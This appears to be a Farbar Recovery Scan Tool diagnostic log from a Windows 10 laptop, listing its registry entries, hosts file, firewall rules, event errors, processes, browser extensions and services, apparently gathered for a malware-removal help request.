HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 09:25 - 2016-05-24 01:02 - 00001006 ____N C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 union.baidu2019.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 75.75.76.76 - 75.75.75.75
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\...\StartupApproved\StartupFolder: => "PalTalk.lnk"
HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\...\StartupApproved\Run: => "Skype"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{F9C1770F-D850-4923-AFE4-D71E5AE14530}] => (Allow) C:\Program Files (x86)\McAfee\Supportability\MVT\MvtApp.exe
FirewallRules: [{1232286A-8F92-4E58-93F0-BBF2488813CF}] => (Allow) C:\Program Files (x86)\McAfee\Supportability\MVT\MvtApp.exe
FirewallRules: [{C9252ADA-1EE3-4B34-BED3-3188608D9B68}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
FirewallRules: [{C505C96A-5C1F-428E-88D0-70B331737D28}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{8007845D-0C57-4BD7-A2B5-8DDD8664C546}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{1E55AE08-5B94-4330-9B93-53F185195649}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{B6B0FDE9-6B22-4B06-B5B7-00E4D431B81A}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{60C3ABB2-5B37-48F4-AE35-AA8B6DA551CA}] => (Allow) C:\Program Files (x86)\AVG\Av\avgmfapx.exe
FirewallRules: [{3A59B2D5-CF88-4DD8-BEDD-D6F41BAF83BA}] => (Allow) C:\Program Files (x86)\AVG\Av\avgmfapx.exe
FirewallRules: [{096CC655-267C-4ABE-88BB-239987B04D67}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{2D4E5BA9-7E14-4737-9FC9-B69267E903B3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{EB24EF20-B547-498A-92EA-C60255901E84}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

26-05-2016 18:31:06 End of disinfection

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

==================== Event log errors: =========================

Application errors:
==================
Error: (05/30/2016 04:52:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP2)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (05/30/2016 04:52:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP2)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (05/27/2016 11:46:23 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mmc.exe, version: 10.0.10586.0, time stamp: 0x5632d42c
Faulting module name: KERNELBASE.dll, version: 10.0.10586.306, time stamp: 0x571af331
Exception code: 0x00000000
Fault offset: 0x0000000000071f28
Faulting process id: 0x3d8
Faulting application start time: 0xmmc.exe0
Faulting application path: mmc.exe1
Faulting module path: mmc.exe2
Report Id: mmc.exe3
Faulting package full name: mmc.exe4
Faulting package-relative application ID: mmc.exe5

Error: (05/26/2016 06:31:27 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (05/26/2016 04:25:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP2)
Description: Package windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy+microsoft.windows.immersivecontrolpanel was terminated because it took too long to suspend.

Error: (05/26/2016 04:25:11 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (05/26/2016 04:22:34 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP2)
Description: Package windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy+microsoft.windows.immersivecontrolpanel was terminated because it took too long to suspend.

Error: (05/26/2016 04:20:29 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (05/26/2016 04:19:57 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP2)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (05/26/2016 04:16:52 PM) (Source: AVLogEvent) (EventID: 5005) (User: NT AUTHORITY)
Description: Content is missing.
Error Code:a7f42014

System errors:
=============
Error: (05/30/2016 11:21:37 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (05/30/2016 10:38:27 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Sync Host_51a4a82 service to connect.

Error: (05/30/2016 10:38:27 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the User Data Storage_51a4a82 service to connect.

Error: (05/30/2016 10:38:27 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the User Data Storage_51a4a82 service, but this action failed with the following error:
%%1056

Error: (05/30/2016 10:38:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_51a4a82 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (05/30/2016 10:38:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_51a4a82 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (05/30/2016 10:38:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_51a4a82 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (05/30/2016 10:38:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_51a4a82 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (05/30/2016 10:38:16 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (05/30/2016 07:09:36 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

CodeIntegrity:
===================================
Date: 2016-05-25 18:20:08.795
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 18:20:08.764
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 18:20:07.972
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 18:20:07.896
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 18:05:19.957
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 18:05:19.822
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 17:48:36.052
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 17:48:35.969
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 17:48:35.036
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 17:48:34.956
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Memory info ===========================

Processor: Intel(R) Celeron(R) CPU N2830 @ 2.16GHz
Percentage of memory in use: 78%
Total physical RAM: 1933.93 MB
Available physical RAM: 411.86 MB
Total Virtual: 3308.57 MB
Available Virtual: 1239.23 MB

==================== Drives ================================

Drive c: (TI10700000B) (Fixed) (Total:455.56 GB) (Free:424.68 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt ============================

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:29-05-2016 02
Ran by Jackie (administrator) on LAPTOP2 (31-05-2016 02:52:22)
Running from C:\Users\Jackie\Downloads
Loaded Profiles: Jackie (Available Profiles: Jackie)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Trend Micro Inc.) C:\Program Files (x86)\AntiRansomware2.0\ARService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Intel(R) Corporation) C:\Program Files\Intel Corporation\Intel(R) Technology Access\LegacyCsLoaderService.exe
(Intel(R) Corporation) C:\Program Files\Intel Corporation\Intel(R) Technology Access\IntelTechnologyAccessService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Toshiba Corporation) C:\Program Files\TOSHIBA\Teco\TecoService.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler64.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.9.741.0\McCSPServiceHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(McAfee, Inc.) C:\Program Files\McAfee\MAT\McPvTray.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Teco\TecoResident.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Security) C:\Program Files\Common Files\McAfee\ClientAnalytics\McClientAnalytics.exe
(Farbar) C:\Users\Jackie\Downloads\FRST64 (1).exe
(Farbar) C:\Users\Jackie\Downloads\FRST64 (1).exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe [2556768 2013-10-08] (TOSHIBA Corporation)
HKLM\...\Run: [TecoResident] => C:\Program Files\TOSHIBA\Teco\TecoResident.exe [180016 2015-06-08] (TOSHIBA Corporation)
HKLM\...\Run: [TSSSrv] => C:\Program Files (x86)\TOSHIBA\System Setting\TSSSrv.exe [296008 2013-10-21] (TOSHIBA Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3946184 2015-09-15] (Synaptics Incorporated)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.76.76 75.75.75.75
Tcpip\..\Interfaces\{66275f01-419d-4395-b1b4-21f2d8236596}: [DhcpNameServer] 75.75.76.76 75.75.75.75
Tcpip\..\Interfaces\{bb611e39-c248-4c60-a443-f92cddc7cede}: [DhcpNameServer] 192.168.1.1
ManualProxies:

Internet Explorer:
==================
HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://search.msn.com/spbasic.htm
SearchScopes: HKLM -> DefaultScope {CC7D093D-4ABE-474B-A201-7825CE0EADA6} URL =
SearchScopes: HKLM -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL =
SearchScopes: HKU\S-1-5-21-3380728539-3698184502-3448567052-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3380728539-3698184502-3448567052-1001 -> OldSearch URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C015US0D20151020&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3380728539-3698184502-3448567052-1001 -> {0C383FBE-20B3-4164-AFB8-8107A0619E43} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-09-22] (Eyeo GmbH)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-09-22] (Eyeo GmbH)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2016-04-28] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2016-04-28] (McAfee, Inc.)

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_21_0_0_242.dll [2016-05-26] ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-04-28] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_242.dll [2016-05-26] ()
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-04-28] ()
FF Plugin-x32: @mcafee.com/MVT -> C:\Program Files (x86)\McAfee\Supportability\MVT\NPMVTPlugin.dll [2015-11-09] (McAfee, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-10] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-10] (Google Inc.)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2016-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-05-26] [not signed]
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.63\PepperFlash\pepflashplayer.dll ()
CHR Profile: C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Adblock Plus) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-05-26]
CHR Extension: (Denki Word Quest) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\dibnbdoaalhdbddheelckdbghjhgkahn [2016-05-26]
CHR Extension: (Best Classic Games) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcbmdiimnpgomgicdjpndfifjiieijdk [2016-05-26]
CHR Extension: (Chrome Remote Desktop) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-05-26]
CHR Extension: (Chess) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcoafacoamancaniegeddbpojbjkfgbc [2016-05-26]
CHR Extension: (UNO 3D HD) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdkfcgceminipbgjnnimdkejmlaecebj [2016-05-26]
CHR Extension: (Jewels Quest) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghinojlokimkacfpnpaimmldijliiboe [2016-05-26]
CHR Extension: (Mahjong Solitaire Classic ) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\inonaeciahnfjfdnodcinlmmofacedah [2016-05-26]
CHR Extension: (Printiki) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\jihhiodbgkjkicajlbolnnkebbigngdf [2016-05-26]
CHR Extension: (Google Hangouts) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\knipolnnllmklapflnccelgolnpehhpl [2016-05-26]
CHR Extension: (Google Hangouts) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2016-05-26]
CHR Extension: (Mahjong Solitaire) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\neojceinbonpjjcokpokpeobkhcpiloc [2016-05-26]
CHR Extension: (MONOPOLY: The World Edition) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkedhiolniniodbokjinplhaleemnfbe [2016-05-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-05-25]
CHR Extension: (Mobialia Chess 3D) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nngfppohnieolpklikdmhbofoabooijm [2016-05-26]
CHR Extension: (Spring Mahjong) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\oohmgpjbkliggjliakneoaedilbaihhl [2016-05-26]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-05-26]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-05-26]
CHR HKLM-x32\...\Chrome\Extension: [gdfjhiclilbjdpeejgcgebmmihkkofji] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AntiRansomwareService; C:\Program Files (x86)\AntiRansomware2.0\arservice.exe [100864 2015-07-30] (Trend Micro Inc.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe [69016 2016-03-08] (Google Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [328624 2015-11-09] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel(R) Corporation)
S3 Intel(R) TA SAM; C:\Program Files (x86)\Intel Corporation\Intel(R) Technology Access\Intel(R) Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [19088 2015-08-12] (Intel Corporation)
R2 Intel(R) TechnologyAccessLegacyCSLoader; C:\Program Files\Intel Corporation\Intel(R) Technology Access\LegacyCsLoaderService.exe [154272 2016-03-15] (Intel(R) Corporation)
R2 Intel(R) TechnologyAccessService; C:\Program Files\Intel Corporation\Intel(R) Technology Access\IntelTechnologyAccessService.exe [479392 2016-03-15] (Intel(R) Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-25] (Intel Corporation)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [163592 2016-04-20] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [989192 2016-04-28] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
